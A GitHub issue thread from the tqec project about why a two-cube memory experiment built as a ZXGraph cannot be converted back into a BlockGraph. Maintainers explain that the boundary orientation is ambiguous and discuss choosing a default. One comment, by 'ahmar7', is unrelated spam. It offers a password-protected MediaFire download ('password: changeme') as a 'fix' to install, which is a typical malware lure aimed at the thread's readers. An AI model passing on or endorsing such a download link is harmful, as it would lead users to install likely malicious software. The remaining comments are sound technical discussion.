### ISSUE TITLE
Memory experiments are not valid as block graph

### ISSUE THREAD

**Issue by Gistbatch** [QCHackers/tqec#304]
## Describe the bug
I'm not sure if this is the intended behavior but we cannot generate a simple memory experiment as `ZXGraph` and convert it to a `BlockGraph`.

## Steps to reproduce the behavior:
```python
cubes = [
    (Position3D(0, 0, 0), CubeType.ZXZ),
    (Position3D(0, 0, 1), CubeType.ZXZ),
]
pipes = [
    (cubes[0][0], cubes[1][0], PipeType.ZXO),
]
block_graph = BlockGraph(name="Memory Experiment")
for cube in cubes:
    block_graph.add_cube(*cube)
block_graph.add_pipe(*pipes[0])
zx_from_block_graph = block_graph.to_zx_graph()
new_block_graph = BlockGraph.from_zx_graph(zx_from_block_graph) #<--This fails
```

## Expected behavior
I would expect this to work. Unfortunately, [from_zx_graph](https://github.com/QCHackers/tqec/blob/3ce9649c528fc245ecdb85a5c8a52e94806f88b9/src/tqec/sketchup/block_graph.py#L496) is locking for a corner block.

## Screenshots and MP4s
![Figure_1](https://github.com/user-attachments/assets/d075b977-add7-4f3e-a166-b4708c9619e5)

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by inmzhang** [comment]
This is an intended behavior by design. When we have a simple `ZXGraph` like this one or even a single node, we cannot tell the spatial boundary orientation, e.g. `zxzx` or `xzxz`. So we should build it directly with `BlockGraph` by specifying the cube types explicitly.

I'm not sure whether this is a good design and maybe we can choose one orientation arbitrarily for the simple `ZXGraph` during conversion. What do you think?

**Comment by Gistbatch** [comment]
Ah, I understand! There might be a sensible default, and Austin may have a suggestion. At least for the construction of the `BlockGraph`, I don't see that it makes any difference. Does this influence the search for observables/detectors?

**Comment by inmzhang** [comment]
> Does this influence the search for observables/detectors?

The conversion from a `BlockGraph` to `ZXGraph` should always work correctly. Once we have a valid `BlockGraph`, we can find the observables with its corresponding `ZXGraph` as expected. And currently detector construction only work at the circuit level.

**Comment by afowler** [comment]
SketchUp has RGB axes, arbitrary preference for X along G if there is
ambiguity.
